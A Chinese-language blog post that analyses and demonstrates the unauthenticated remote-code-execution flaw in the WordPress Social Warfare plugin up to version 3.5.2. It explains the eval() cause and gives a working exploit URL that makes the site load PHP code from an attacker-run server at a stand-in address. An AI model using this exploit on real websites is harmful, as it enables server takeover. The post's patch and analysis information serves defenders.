WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

Mr.Wu 311 0

3 月 21 日插件作者紧急发布了 3.5.3 版本以修复高危的 RCE 漏
洞,在<=3.5.2 版本中存在一处无需登录即可 getshell 的 RCE 漏洞。

漏洞分析

在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php

文件中有一处 eval()函数,该函数将 file_get_contents() 读取的文件内容当做 PHP 代码执行,导致 RCE。

漏洞利用

1、刺探是否安装了 Social Warfare 插件
访问http://127.0.0.1/wp-content/plugins/social-warfare/read
me.txt,如果存在 readme.txt 文件则说明已经安装该插件,并且从
该 txt 文件中可获知插件的版本。我的本机环境为 3.5.2 版本。

2、在自己的 VPS 服务器上放置一个 code.txt 文件,并启动 HTTP 服 务器使该文件可通过 HTTP 访问。文件内容如下:

3、在未登陆任何账号的情况下直接访问如下链接即可 getshell。 http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_op tions&swp_url=http://your_ip/code.txt&wpaa=phpinfo();

广告

打赏
发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ